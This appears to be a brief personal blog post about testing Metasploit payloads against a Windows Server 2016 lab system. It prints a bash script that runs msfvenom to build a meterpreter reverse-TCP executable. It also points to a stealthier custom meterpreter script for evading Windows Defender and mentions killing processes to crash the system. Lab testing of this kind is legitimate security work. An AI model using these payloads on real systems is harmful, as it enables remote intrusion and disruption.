Windows 2016 Server and Metasploit

Alive and kicking. Windows 2016 10.0.14393 RTM and some Metasploit testing. Decided not to use MobaXterm for file transfer as this messes up the NTFS security permissions somehow.

This time I have just used Samba to transfer the payloads to the testing system.

In the first scenario I have just used a simple venom generated EXE to check the Windows Defender awareness on the Windows 2016 system. As expected it detects the generated payload and blocks the file transfer.

clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " By Astr0baby 2011 "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R -f exe > default.ex

Next we try the more stealthy method

https://github.com/DoktorCranium/metasploit/blob/master/CUSTOM-meterpreter.sh

From within the default Administrator account no UAC bugs us to get some good system permissions.

Once we get the permissions, some messing around with killing some PIDs to bring the system down.

Please see the recording of the above example here:

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s